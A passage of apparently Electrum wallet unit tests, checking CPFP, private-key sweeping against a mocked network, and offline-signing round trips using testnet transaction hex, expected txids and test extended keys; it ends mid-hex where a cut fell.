funding_tx = Transaction('01000000000101c0ec8b6cdcb6638fa117ead71a8edebc189b30e6e5415bdfb3c8260aa269e6520000000017160014ba9ca815474a674ff1efb3fc82cf0f3460de8c57fdffffff0230390f000000000017a9148b59abaca8215c0d4b18cbbf715550aa2b50c85b87404b4c000000000016001483c3bc7234f17a209cc5dcce14903b54ee4dab9002473044022038a05f7d38bcf810dfebb39f1feda5cc187da4cf5d6e56986957ddcccedc75d302203ab67ccf15431b4e2aeeab1582b9a5a7821e7ac4be8ebf512505dbfdc7e094fd0121032168234e0ba465b8cedc10173ea9391725c0f6d9fa517641af87926626a5144abd391400')
funding_txid = funding_tx.txid()
funding_output_value = 5000000
self.assertEqual('c36a6e1cd54df108e69574f70bc9b88dc13beddc70cfad9feb7f8f6593255d4a', funding_txid)
wallet.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# cpfp tx
tx = wallet.cpfp(funding_tx, fee=50000)
tx.set_rbf(True)
tx.locktime = 1325501
wallet.sign_transaction(tx, password=None)
self.assertTrue(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertEqual(tx.txid(), tx_copy.txid())
self.assertEqual(tx.wtxid(), tx_copy.wtxid())
self.assertEqual('010000000001014a5d2593658f7feb9fadcf70dced3bc18db8c90bf77495e608f14dd51c6e6ac30100000000fdffffff01f0874b000000000016001483c3bc7234f17a209cc5dcce14903b54ee4dab900248304502210098fbe458a9f1c595d6bf63962fad00300a7b60c6dd8b2e7625f3804a3bf1086602204bc8a46fb162be8f85a23644eccf9f4223fa092f5c861144676a34dc83a7c39d012102a6ff1ffc189b4776b78e20edca969cc45da3e610cc0cc79925604be43fee469fbd391400',
str(tx_copy))
self.assertEqual('38a21c67336232c88ae15311f329197c69ee70e872f8acb5bc9c2b6417c35ad8', tx_copy.txid())
self.assertEqual('b5b8264ed5f3e03d48ef82fa2a25278cd9c0563fa78e557f370b7e0558293172', tx_copy.wtxid())
wallet.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
self.assertEqual((0, funding_output_value - 50000, 0), wallet.get_balance())
@needs_test_with_all_ecc_implementations
def test_sweep_p2pk(self):
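        # sweep() takes bare WIF private keys, asks the (mocked) network for the
        # UTXOs of the corresponding scripts, and drains them to the recipient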
class NetworkMock:
relay_fee = 1000
def get_local_height(self): return 1325785
def listunspent_for_scripthash(self, scripthash):
if scripthash == '460e4fb540b657d775d84ff4955c9b13bd954c2adc26a6b998331343f85b6a45':
return [{'tx_hash': 'ac24de8b58e826f60bd7b9ba31670bdfc3e8aedb2f28d0e91599d741569e3429', 'tx_pos': 1, 'height': 1325785, 'value': 1000000}]
else:
return []
privkeys = ['93NQ7CFbwTPyKDJLXe97jczw33fiLijam2SCZL3Uinz1NSbHrTu', ]
network = NetworkMock()
dest_addr = 'tb1q3ws2p0qjk5vrravv065xqlnkckvzcpclk79eu2'
tx = sweep(privkeys, network, config=None, recipient=dest_addr, fee=5000)
tx_copy = Transaction(tx.serialize())
self.assertEqual('010000000129349e5641d79915e9d0282fdbaee8c3df0b6731bab9d70bf626e8588bde24ac010000004847304402206bf0d0a93abae0d5873a62ebf277a5dd2f33837821e8b93e74d04e19d71b578002201a6d729bc159941ef5c4c9e5fe13ece9fc544351ba531b00f68ba549c8b38a9a01fdffffff01b82e0f00000000001600148ba0a0bc12b51831f58c7ea8607e76c5982c071fd93a1400',
str(tx_copy))
self.assertEqual('7f827fc5256c274fd1094eb7e020c8ded0baf820356f61aa4f14a9093b0ea0ee', tx_copy.txid())
self.assertEqual('7f827fc5256c274fd1094eb7e020c8ded0baf820356f61aa4f14a9093b0ea0ee', tx_copy.wtxid())
class TestWalletOfflineSigning(TestCaseForTestnet):
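    # Cold-storage round trip: a watch-only (xpub, "online") wallet builds an
    # unsigned transaction, which is then signed by the matching offline wallet
    # that holds the corresponding xprv.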
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.electrum_path = tempfile.mkdtemp()
cls.config = SimpleConfig({'electrum_path': cls.electrum_path})
@classmethod
def tearDownClass(cls):
super().tearDownClass()
shutil.rmtree(cls.electrum_path)
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_offline_xprv_online_xpub_p2pkh(self, mock_write):
wallet_offline = WalletIntegrityHelper.create_standard_wallet(
# bip39: "qwe", der: m/44'/1'/0'
keystore.from_xprv('tprv8gfKwjuAaqtHgqxMh1tosAQ28XvBMkcY5NeFRA3pZMpz6MR4H4YZ3MJM4fvNPnRKeXR1Td2vQGgjorNXfo94WvT5CYDsPAqjHxSn436G1Eu'),
gap_limit=4
)
wallet_online = WalletIntegrityHelper.create_standard_wallet(
keystore.from_xpub('tpubDDMN69wQjDZxaJz9afZQGa48hZS7X5oSegF2hg67yddNvqfpuTN9DqvDEp7YyVf7AzXnqBqHdLhzTAStHvsoMDDb8WoJQzNrcHgDJHVYgQF'),
gap_limit=4
)
# bootstrap wallet_online
        funding_tx = Transaction('01000000000116e9c9dac2651672316aab3b9553257b6942c5f762c5d795776d9cfa504f183c000000000000fdffffff8085019852fada9da84b58dcf753d292dde314a19f5a5527f6588fa2566142130000000000fdffffffa4154a48db20ce538b28722a89c6b578bd5b5d60d6d7b52323976339e39405230000000000fdffffff0b5ef43f843a96364aebd708e25ea1bdcf2c7df7d0d995560b8b1be5f357b64f0100000000fdffffffd41dfe1199c76fdb3f20e9947ea31136d032d9da48c5e45d85c8f440e2351a510100000000fdffffff5bd015d17e4a1837b01c24ebb4a6b394e3da96a85442bd7dc6abddfbf16f20510000000000fdffffff13a3e7f80b1bd46e38f2abc9e2f335c18a4b0af1778133c7f1c3caae9504345c0200000000fdffffffdf4fc1ab21bca69d18544ddb10a913cd952dbc730ab3d236dd9471445ff405680100000000fdffffffe0424d78a30d5e60ac6b26e2274d7d6e7c6b78fe0b49bdc3ac4dd2147c9535750100000000fdffffff7ab6dd6b3c0d44b0fef0fdc9ab0ad6eee23eef799eee29c005d52bc4461998760000000000fdffffff48a77e5053a21acdf4f235ce00c82c9bc1704700f54d217f6a30704711b9737d0000000000fdffffff86918b39c1d9bb6f34d9b082182f73cedd15504331164dc2b186e95c568ccb870000000000fdffffff15a847356cbb44be67f345965bb3f2589e2fec1c9a0ada21fd28225dcc602e8f0100000000fdffffff9a2875297f81dfd3b77426d63f621db350c270cc28c634ad86b9969ee33ac6960000000000fdffffffd6eeb1d1833e00967083d1ab86fa5a2e44355bd613d9277135240fe6f60148a20100000000fdffffffd8a6e5a9b68a65ff88220ca33e36faf6f826ae8c5c8a13fe818a5e63828b68a40100000000fdffffff73aab8471f82092e45ed1b1afeffdb49ea1ec74ce4853f971812f6a72a7e85aa0000000000fdffffffacd6459dec7c3c51048eb112630da756f5d4cb4752b8d39aa325407ae0885cba0000000000fdffffff1eddd5e13bef1aba1ff151762b5860837daa9b39db1eae8ea8227c81a5a1c8ba0000000000fdffffff67a096ff7c343d39e96929798097f6d7a61156bbdb905fbe534ba36f273271d40100000000fdffffff109a671eb7daf6dcd07c0ceff99f2de65864ab36d64fb3a890bab951569adeee0100000000fdffffff4f1bdc64da8056d08f79db7f5348d1de55946e57aa7c8279499c703889b6e0fd0200000000fdffffff042f280000000000001600149c756aa33f4f89418b33872a973274b5445c727b80969800000000001600146c540c1c9f546004539f45318b8d9f4d7b4857ef80969800000000001976a91422a6daa4a7b695c8a2dd104d47c5dc73d655c96f88ac809698000000000017a914a6885437e0762013facbda93894202a0fe86e35f8702473044022075ef5f04d7a63347064938e15a0c74277a79e5c9d32a26e39e8a517a44d565cc022015246790fb5b29c9bf3eded1b95699b1635bcfc6d521886fddf1135ba1b988ec012102801bc7170efb82c490e243204d86970f15966aa3bce6a06bef5c09a83a5bfffe02473044022061aa9b0d9649ffd7259bc54b35f678565dbbe11507d348dd8885522eaf1fa70c02202cc79de09e8e63e8d57fde6ef66c079ddac4d9828e1936a9db833d4c142615c3012103a8f58fc1f5625f18293403104874f2d38c9279f777e512570e4199c7d292b81b0247304402207744dc1ab0bf77c081b58540c4321d090c0a24a32742a361aa55ad86f0c7c24e02201a9b0dd78b63b495ab5a0b5b161c54cb085d70683c90e188bb4dc2e41e142f6601210361fb354f8259abfcbfbdda36b7cb4c3b05a3ca3d68dd391fd8376e920d93870d0247304402204803e423c321acc6c12cb0ebf196d2906842fdfed6de977cc78277052ee5f15002200634670c1dc25e6b1787a65d3e09c8e6bb0340238d90b9d98887e8fd53944e080121031104c60d027123bf8676bcaefaa66c001a0d3d379dc4a9492a567a9e1004452d02473044022050e4b5348d30011a22b6ae8b43921d29249d88ea71b1fbaa2d9c22dfdef58b7002201c5d5e143aa8835454f61b0742226ebf8cd466bcc2cdcb1f77b92e473d3b13190121030496b9d49aa8efece4f619876c60a77d2c0dc846390ecdc5d9acbfa1bb3128760247304402204d6a9b986e1a0e3473e8aef84b3eb7052442a76dfd7631e35377f141496a55490220131ab342853c01e31f111436f8461e28bc95883b871ca0e01b5f57146e79d7bb012103262ffbc88e25296056a3c65c880e3686297e07f360e6b80f1219d65b0900e84e02483045022100c8ffacf92efa1dddef7e858a241af7a80adcc2489bcc325195970733b1f35fac022076f40c26023a228041a9665c5290b9918d06f03b716e4d8f6d47e79121c7eb37012102d9ba7e02d7cd7dd24302f823b3114c99da21549c663f72440dc87e8ba412120902483045022100b55545d84e43d001bbc10a981f184e7d3b98a7ed6689863716cab053b3655a2f0220537eb76a695fbe86bf020b4b6f7ae93b506d778bbd0885f0a61067616a2c8bce0121034a57f2fa2c32c9246691f6a922fb1ebdf1468792bae7eff253a99fc9f2a5023902483045022100f1d4408463dbfe257f9f778d5e9c8cdb97c8b1d395dbd2e180bc08cad306492c022002a024e19e1a406eaa24467f033659de09ab58822987281e28bb6359288337bd012103e91daa18d924eea62011ce596e15b6d683975cf724ea5bf69a8e2022c26fc12f0247304402204f1e12b923872f396e5e1a3aa94b0b2e86b4ce448f4349a017631db26d7dff8a022069899a05de2ad2bbd8e0202c56ab1025a7db9a4998eea70744e3c367d2a7eb71012103b0eee86792dbef1d4a49bc4ea32d197c8c15d27e6e0c5c33e58e409e26d4a39a0247304402201787dacdb92e0df6ad90226649f0e8321287d0bd8fddc536a297dd19b5fc103e022001fe89300a76e5b46d0e3f7e39e0ee26cc83b71d59a2a5da1dd7b13350cd0c07012103afb1e43d7ec6b7999ef0f1093069e68fe1dfe5d73fc6cfb4f7a5022f7098758c02483045022100acc1212bba0fe4fcc6c3ae5cf8e25f221f140c8444d3c08dfc53a93630ac25da02203f12982847244bd9421ef340293f3a38d2ab5d028af60769e46fcc7d81312e7e012102801bc7170efb82c490e243204d86970f15966aa3bce6a06bef5c09a83a5bfffe024830450221009c04934102402949484b21899271c3991c007b783b8efc85a3c3d24641ac7c24022006fb1895ce969d08a2cb29413e1a85427c7e85426f7a185108ca44b5a0328cb301210360248db4c7d7f76fe231998d2967104fee04df8d8da34f10101cc5523e82648c02483045022100b11fe61b393fa5dbe18ab98f65c249345b429b13f69ee2d1b1335725b24a0e73022010960cdc5565cbc81885c8ed95142435d3c202dfa5a3dc5f50f3914c106335ce0121029c878610c34c21381cda12f6f36ab88bf60f5f496c1b82c357b8ac448713e7b50247304402200ca080db069c15bbf98e1d4dff68d0aea51227ff5d17a8cf67ceae464c22bbb0022051e7331c0918cbb71bb2cef29ca62411454508a16180b0fb5df94248890840df0121028f0be0cde43ff047edbda42c91c37152449d69789eb812bb2e148e4f22472c0f0247304402201fefe258938a2c481d5a745ef3aa8d9f8124bbe7f1f8c693e2ddce4ddc9a927c02204049e0060889ede8fda975edf896c03782d71ba53feb51b04f5ae5897d7431dc012103946730b480f52a43218a9edce240e8b234790e21df5e96482703d81c3c19d3f1024730440220126a6a56dbe69af78d156626fc9cf41d6aac0c07b8b5f0f8491f68db5e89cb5002207ee6ed6f2f41da256f3c1e79679a3de6cf34cc08b940b82be14aefe7da031a6b012102801bc7170efb82c490e243204d86970f15966aa3bce6a06bef5c09a83a5bfffe024730440220363204a1586d7f13c148295122cbf9ec7939685e3cadab81d6d9e921436d21b7022044626b8c2bd4aa7c167d74bc4e9eb9d0744e29ce0ad906d78e10d6d854f23d170121037fb9c51716739bb4c146857fab5a783372f72a65987d61f3b58c74360f4328dd0247304402207925a4c2a3a6b76e10558717ee28fcb8c6fde161b9dc6382239af9f372ace99902204a58e31ce0b4a4804a42d2224331289311ded2748062c92c8aca769e81417a4c012102e18a8c235b48e41ef98265a8e07fa005d2602b96d585a61ad67168d74e7391cb02483045022100bbfe060479174a8d846b5a897526003eb2220ba307a5fee6e1e8de3e4e8b38fd02206723857301d447f67ac98a5a5c2b80ef6820e98fae213db1720f93d91161803b01210386728e2ac3ecee15f58d0505ee26f86a68f08c702941ffaf2fb7213e5026aea10247304402203a2613ae68f697eb02b5b7d18e3c4236966dac2b3a760e3021197d76e9ad4239022046f9067d3df650fcabbdfd250308c64f90757dec86f0b08813c979a42d06a6ec012102a1d7ee1cb4dc502f899aaafae0a2eb6cbf80d9a1073ae60ddcaabc3b1d1f15df02483045022100ab1bea2cc5388428fd126c7801550208701e21564bd4bd00cfd4407cfafc1acd0220508ee587f080f3c80a5c0b2175b58edd84b755e659e2135b3152044d75ebc4b501210236dd1b7f27a296447d0eb3750e1bdb2d53af50b31a72a45511dc1ec3fe7a684a19391400')
funding_txid = funding_tx.txid()
self.assertEqual('98574bc5f6e75769eb0c93d41453cc1dfbd15c14e63cc3c42f37cdbd08858762', funding_txid)
wallet_online.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create unsigned tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, 'tb1qp0mv2sxsyxxfj5gl0332f9uyez93su9cf26757', 2500000)]
tx = wallet_online.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx.set_rbf(True)
tx.locktime = 1325340
self.assertFalse(tx.is_complete())
self.assertFalse(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet_online.is_mine(wallet_online.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual(tx.txid(), tx_copy.txid())
# sign tx
tx = wallet_offline.sign_transaction(tx_copy, password=None)
self.assertTrue(tx.is_complete())
self.assertFalse(tx.is_segwit())
self.assertEqual('d9c21696eca80321933e7444ca928aaf25eeda81aaa2f4e5c085d4d0a9cf7aa7', tx.txid())
self.assertEqual('d9c21696eca80321933e7444ca928aaf25eeda81aaa2f4e5c085d4d0a9cf7aa7', tx.wtxid())
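
# same offline-signer / online-watcher flow as above, now with p2wpkh-p2sh (BIP49) keys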
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_offline_xprv_online_xpub_p2wpkh_p2sh(self, mock_write):
wallet_offline = WalletIntegrityHelper.create_standard_wallet(
# bip39: "qwe", der: m/49'/1'/0'
keystore.from_xprv('uprv8zHHrMQMQ26utWwNJ5MK2SXpB9hbmy7pbPaneii69xT8cZTyFpxQFxkknGWKP8dxBTZhzy7yP6cCnLrRCQjzJDk3G61SjZpxhFQuB2NR8a5'),
gap_limit=4
)
wallet_online = WalletIntegrityHelper.create_standard_wallet(
keystore.from_xpub('upub5DGeFrwFEPfD711qQ6tKPaUYjBY6BRqfxcWPT77hiHz7VMo7oNGeom5EdXoKXEazePyoN3ueJMqHBfp3MwmsaD8k9dFHoa8KGeVXev7Pbg2'),
gap_limit=4
)
# bootstrap wallet_online
funding_tx = Transaction('01000000000116e9c9dac2651672316aab3b9553257b6942c5f762c5d795776d9cfa504f183c000000000000fdffffff8085019852fada9da84b58dcf753d292dde314a19f5a5527f6588fa2566142130000000000fdffffffa4154a48db20ce538b28722a89c6b578bd5b5d60d6d7b52323976339e39405230000000000fdffffff0b5ef43f843a96364aebd708e25ea1bdcf2c7df7d0d995560b8b1be5f357b64f0100000000fdffffffd41dfe1199c76fdb3f20e9947ea31136d032d9da48c5e45d85c8f440e2351a510100000000fdffffff5bd015d17e4a1837b01c24ebb4a6b394e3da96a85442bd7dc6abddfbf16f20510000000000fdffffff13a3e7f80b1bd46e38f2abc9e2f335c18a4b0af1778133c7f1c3caae9504345c0200000000fdffffffdf4fc1ab21bca69d18544ddb10a913cd952dbc730ab3d236dd9471445ff405680100000000fdffffffe0424d78a30d5e60ac6b26e2274d7d6e7c6b78fe0b49bdc3ac4dd2147c9535750100000000fdffffff7ab6dd6b3c0d44b0fef0fdc9ab0ad6eee23eef799eee29c005d52bc4461998760000000000fdffffff48a77e5053a21acdf4f235ce00c82c9bc1704700f54d217f6a30704711b9737d0000000000fdffffff86918b39c1d9bb6f34d9b082182f73cedd15504331164dc2b186e95c568ccb870000000000fdffffff15a847356cbb44be67f345965bb3f2589e2fec1c9a0ada21fd28225dcc602e8f0100000000fdffffff9a2875297f81dfd3b77426d63f621db350c270cc28c634ad86b9969ee33ac6960000000000fdffffffd6eeb1d1833e00967083d1ab86fa5a2e44355bd613d9277135240fe6f60148a20100000000fdffffffd8a6e5a9b68a65ff88220ca33e36faf6f826ae8c5c8a13fe818a5e63828b68a40100000000fdffffff73aab8471f82092e45ed1b1afeffdb49ea1ec74ce4853f971812f6a72a7e85aa0000000000fdffffffacd6459dec7c3c51048eb112630da756f5d4cb4752b8d39aa325407ae0885cba0000000000fdffffff1eddd5e13bef1aba1ff151762b5860837daa9b39db1eae8ea8227c81a5a1c8ba0000000000fdffffff67a096ff7c343d39e96929798097f6d7a61156bbdb905fbe534ba36f273271d40100000000fdffffff109a671eb7daf6dcd07c0ceff99f2de65864ab36d64fb3a890bab951569adeee0100000000fdffffff4f1bdc64da8056d08f79db7f5348d1de55946e57aa7c8279499c703889b6e0fd0200000000fdffffff042f280000000000001600149c756aa33f4f89418b33872a973274b5445c727b80969800000000001600146c540c1c9f546004539f45318b8d9f4d7b4857ef80969800000000001976a91422a6daa4a7b695c8a2dd104d47c5dc73d655c96f88ac809698000000000017a914a6885437e0762013facbda93894202a0fe86e35f8702473044022075ef5f04d7a63347064938e15a0c74277a79e5c9d32a26e39e8a517a44d565cc022015246790fb5b29c9bf3eded1b95699b1635bcfc6d521886fddf1135ba1b988ec012102801bc7170efb82c490e243204d86970f15966aa3bce6a06bef5c09a83a5bfffe02473044022061aa9b0d9649ffd7259bc54b35f678565dbbe11507d348dd8885522eaf1fa70c02202cc79de09e8e63e8d57fde6ef66c079ddac4d9828e1936a9db833d4c142615c3012103a8f58fc1f5625f18293403104874f2d38c9279f777e512570e4199c7d292b81b0247304402207744dc1ab0bf77c081b58540c4321d090c0a24a32742a361aa55ad86f0c7c24e02201a9b0dd78b63b495ab5a0b5b161c54cb085d70683c90e188bb4dc2e41e142f6601210361fb354f8259abfcbfbdda36b7cb4c3b05a3ca3d68dd391fd8376e920d93870d0247304402204803e423c321acc6c12cb0ebf196d2906842fdfed6de977cc78277052ee5f15002200634670c1dc25e6b1787a65d3e09c8e6bb0340238d90b9d98887e8fd53944e080121031104c60d027123bf8676bcaefaa66c001a0d3d379dc4a9492a567a9e1004452d02473044022050e4b5348d30011a22b6ae8b43921d29249d88ea71b1fbaa2d9c22dfdef58b7002201c5d5e143aa8835454f61b0742226ebf8cd466bcc2cdcb1f77b92e473d3b13190121030496b9d49aa8efece4f619876c60a77d2c0dc846390ecdc5d9acbfa1bb3128760247304402204d6a9b986e1a0e3473e8aef84b3eb7052442a76dfd7631e35377f141496a55490220131ab342853c01e31f111436f8461e28bc95883b871ca0e01b5f57146e79d7bb012103262ffbc88e25296056a3c65c880e3686297e07f360e6b80f1219d65b0900e84e02483045022100c8ffacf92efa1dddef7e858a241af7a80adcc2489bcc325195970733b1f35fac022076f40c26023a228041a9665c5290b9918d06f03b716e4d8f6d47e79121c7eb37012102d9ba7e02d7cd7dd24302f823b3114c99da21549c663f72440dc87e8ba412120902483045022100b55545d84e43d001bbc10a981f184e7d3b98a7ed6689863716cab053b3655a2f0220537eb76a695fbe86bf020b4b6f7ae93b506d778bbd0885f0a61067616a2c8bce0121034a57f2fa2c32c9246691f6a922fb1ebdf1468792bae7eff253a99fc9f2a5023902483045022100f1d4408463dbfe257f9f778d5e9c8cdb97c8b1d395dbd2e180bc08cad306492c022002a024e19e1a406eaa24467f033659de09ab58822987281e28bb6359288337bd012103e91daa18d924eea62011ce596e15b6d683975cf724ea5bf69a8e2022c26fc12f0247304402204f1e12b923872f396e5e1a3aa94b0b2e86b4ce448f4349a017631db26d7dff8a022069899a05de2ad2bbd8e0202c56ab1025a7db9a4998eea70744e3c367d2a7eb71012103b0eee86792dbef1d4a49bc4ea32d197c8c15d27e6e0c5c33e58e409e26d4a39a0247304402201787dacdb92e0df6ad90226649f0e8321287d0bd8fddc536a297dd19b5fc103e022001fe89300a76e5b46d0e3f7e39e0ee26cc83b71d59a2a5da1dd7b13350cd0c07012103afb1e43d7ec6b7999ef0f1093069e68fe1dfe5d73fc6cfb4f7a5022f7098758c02483045022100acc1212bba0fe4fcc6c3ae5cf8e25f221f140c8444d3c08dfc53a93630ac25da02203f12982847244bd9421ef340293f3a38d2ab5d028af60769e46fcc7d81312e7e012102801bc7170efb82c490e243204d86970f15966aa3bce6a06bef5c09a83a5bfffe024830450221009c04934102402949484b21899271c3991c007b783b8efc85a3c3d24641ac7c24022006fb1895ce969d08a2cb29413e1a85427c7e85426f7a185108ca44b5a0328cb301210360248db4c7d7f76fe231998d2967104fee04df8d8da34f10101cc5523e82648c02483045022100b11fe61b393fa5dbe18ab98f65c249345b429b13f69ee2d1b1335725b24a0e73022010960cdc5565cbc81885c8ed95142435d3c202dfa5a3dc5f50f3914c106335ce0121029c878610c34c21381cda12f6f36ab88bf60f5f496c1b82c357b8ac448713e7b50247304402200ca080db069c15bbf98e1d4dff68d0aea51227ff5d17a8cf67ceae464c22bbb0022051e7331c0918cbb71bb2cef29ca62411454508a16180b0fb5df94248890840df0121028f0be0cde43ff047edbda42c91c37152449d69789eb812bb2e148e4f22472c0f0247304402201fefe258938a2c481d5a745ef3aa8d9f8124bbe7f1f8c693e2ddce4ddc9a927c02204049e0060889ede8fda975edf896c03782d71ba53feb51b04f5ae5897d7431dc012103946730b480f52a43218a9edce240e8b234790e21df5e96482703d81c3c19d3f1024730440220126a6a56dbe69af78d156626fc9cf41d6aac0c07b8b5f0f8491f68db5e89cb5002207ee6ed6f2f41da256f3c1e79679a3de6cf34cc08b940b82be14aefe7da031a6b012102801bc7170efb82c490e243204d86970f15966aa3bce6a06bef5c09a83a5bfffe024730440220363204a1586d7f13c148295122cbf9ec7939685e3cadab81d6d9e921436d21b7022044626b8c2bd4aa7c167d74bc4e9eb9d0744e29ce0ad906d78e10d6d854f23d170121037fb9c51716739bb4c146857fab5a783372f72a65987d61f3b58c74360f4328dd0247304402207925a4c2a3a6b76e10558717ee28fcb8c6fde161b9dc6382239af9f372ace99902204a58e31ce0b4a4804a42d2224331289311ded2748062c92c8aca769e81417a4c012102e18a8c235b48e41ef98265a8e07fa005d2602b96d585a61ad67168d74e7391cb02483045022100bbfe060479174a8d846b5a897526003eb2220ba307a5fee6e1e8de3e4e8b38fd02206723857301d447f67ac98a5a5c2b80ef6820e98fae213db1720f93d91161803b01210386728e2ac3ecee15f58d0505ee26f86a68f08c702941ffaf2fb7213e5026aea10247304402203a2613ae68f697eb02b5b7d18e3c4236966dac2b3a760e3021197d76e9ad4239022046f9067d3df650fcabbdfd250308c64f90757dec86f0b08813c979a42d06a6ec012102a1d7ee1cb4dc502f899aaafae0a2eb6cbf80d9a1073ae60ddcaabc3b1d1f15df02483045022100ab1bea2cc5388428fd126c7801550208701e21564bd4bd00cfd4407cfafc1acd0220508ee587f080f3c80a5c0b2175b58edd84b755e659e2135b3152044d75ebc4b501210236dd1b7f27a296447d0eb3750e1bdb2d53af50b31a72a45511dc1ec3fe7a684a19391400')
funding_txid = funding_tx.txid()
self.assertEqual('98574bc5f6e75769eb0c93d41453cc1dfbd15c14e63cc3c42f37cdbd08858762', funding_txid)
wallet_online.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create unsigned tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, 'tb1qp0mv2sxsyxxfj5gl0332f9uyez93su9cf26757', 2500000)]
tx = wallet_online.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx.set_rbf(True)
tx.locktime = 1325341
self.assertFalse(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet_online.is_mine(wallet_online.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual('3f0d188519237478258ad2bf881643618635d11c2bb95512e830fcf2eda3c522', tx_copy.txid())
self.assertEqual(tx.txid(), tx_copy.txid())
# sign tx
tx = wallet_offline.sign_transaction(tx_copy, password=None)
self.assertTrue(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual('3f0d188519237478258ad2bf881643618635d11c2bb95512e830fcf2eda3c522', tx.txid())
self.assertEqual('27b78ec072a403b0545258e7a1a8d494e4b6fd48bf77f4251a12160c92207cbc', tx.wtxid())
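
# same flow with native segwit p2wpkh (BIP84) keys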
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_offline_xprv_online_xpub_p2wpkh(self, mock_write):
wallet_offline = WalletIntegrityHelper.create_standard_wallet(
# bip39: "qwe", der: m/84'/1'/0'
keystore.from_xprv('vprv9K9hbuA23Bidgj1KRSHUZMa59jJLeZBpXPVn4RP7sBLArNhZxJjw4AX7aQmVTErDt4YFC11ptMLjbwxgrsH8GLQ1cx77KggWeVPeDBjr9xM'),
gap_limit=4
)
wallet_online = WalletIntegrityHelper.create_standard_wallet(
keystore.from_xpub('vpub5Y941QgusZGvuD5nXTpUvVWohm8q41uftcRNronjRWs9jB2iVr4BbxqbRfAoQjWHgJtDCQEXChgfsPbEuBnidtkFztZSD3zDKTrtwXa2LCa'),
gap_limit=4
)
# bootstrap wallet_online
funding_tx = Transaction('01000000000116e9c9dac2651672316aab3b9553257b6942c5f762c5d795776d9cfa504f183c000000000000fdffffff8085019852fada9da84b58dcf753d292dde314a19f5a5527f6588fa2566142130000000000fdffffffa4154a48db20ce538b28722a89c6b578bd5b5d60d6d7b52323976339e39405230000000000fdffffff0b5ef43f843a96364aebd708e25ea1bdcf2c7df7d0d995560b8b1be5f357b64f0100000000fdffffffd41dfe1199c76fdb3f20e9947ea31136d032d9da48c5e45d85c8f440e2351a510100000000fdffffff5bd015d17e4a1837b01c24ebb4a6b394e3da96a85442bd7dc6abddfbf16f20510000000000fdffffff13a3e7f80b1bd46e38f2abc9e2f335c18a4b0af1778133c7f1c3caae9504345c0200000000fdffffffdf4fc1ab21bca69d18544ddb10a913cd952dbc730ab3d236dd9471445ff405680100000000fdffffffe0424d78a30d5e60ac6b26e2274d7d6e7c6b78fe0b49bdc3ac4dd2147c9535750100000000fdffffff7ab6dd6b3c0d44b0fef0fdc9ab0ad6eee23eef799eee29c005d52bc4461998760000000000fdffffff48a77e5053a21acdf4f235ce00c82c9bc1704700f54d217f6a30704711b9737d0000000000fdffffff86918b39c1d9bb6f34d9b082182f73cedd15504331164dc2b186e95c568ccb870000000000fdffffff15a847356cbb44be67f345965bb3f2589e2fec1c9a0ada21fd28225dcc602e8f0100000000fdffffff9a2875297f81dfd3b77426d63f621db350c270cc28c634ad86b9969ee33ac6960000000000fdffffffd6eeb1d1833e00967083d1ab86fa5a2e44355bd613d9277135240fe6f60148a20100000000fdffffffd8a6e5a9b68a65ff88220ca33e36faf6f826ae8c5c8a13fe818a5e63828b68a40100000000fdffffff73aab8471f82092e45ed1b1afeffdb49ea1ec74ce4853f971812f6a72a7e85aa0000000000fdffffffacd6459dec7c3c51048eb112630da756f5d4cb4752b8d39aa325407ae0885cba0000000000fdffffff1eddd5e13bef1aba1ff151762b5860837daa9b39db1eae8ea8227c81a5a1c8ba0000000000fdffffff67a096ff7c343d39e96929798097f6d7a61156bbdb905fbe534ba36f273271d40100000000fdffffff109a671eb7daf6dcd07c0ceff99f2de65864ab36d64fb3a890bab951569adeee0100000000fdffffff4f1bdc64da8056d08f79db7f5348d1de55946e57aa7c8279499c703889b6e0fd0200000000fdffffff042f280000000000001600149c756aa33f4f89418b33872a973274b5445c727b80969800000000001600146c540c1c9f546004539f45318b8d9f4d7b4857ef80969800000000001976a91422a6daa4a7b695c8a2dd104d47c5dc73d655c96f88ac809698000000000017a914a6885437e0762013facbda93894202a0fe86e35f8702473044022075ef5f04d7a63347064938e15a0c74277a79e5c9d32a26e39e8a517a44d565cc022015246790fb5b29c9bf3eded1b95699b1635bcfc6d521886fddf1135ba1b988ec012102801bc7170efb82c490e243204d86970f15966aa3bce6a06bef5c09a83a5bfffe02473044022061aa9b0d9649ffd7259bc54b35f678565dbbe11507d348dd8885522eaf1fa70c02202cc79de09e8e63e8d57fde6ef66c079ddac4d9828e1936a9db833d4c142615c3012103a8f58fc1f5625f18293403104874f2d38c9279f777e512570e4199c7d292b81b0247304402207744dc1ab0bf77c081b58540c4321d090c0a24a32742a361aa55ad86f0c7c24e02201a9b0dd78b63b495ab5a0b5b161c54cb085d70683c90e188bb4dc2e41e142f6601210361fb354f8259abfcbfbdda36b7cb4c3b05a3ca3d68dd391fd8376e920d93870d0247304402204803e423c321acc6c12cb0ebf196d2906842fdfed6de977cc78277052ee5f15002200634670c1dc25e6b1787a65d3e09c8e6bb0340238d90b9d98887e8fd53944e080121031104c60d027123bf8676bcaefaa66c001a0d3d379dc4a9492a567a9e1004452d02473044022050e4b5348d30011a22b6ae8b43921d29249d88ea71b1fbaa2d9c22dfdef58b7002201c5d5e143aa8835454f61b0742226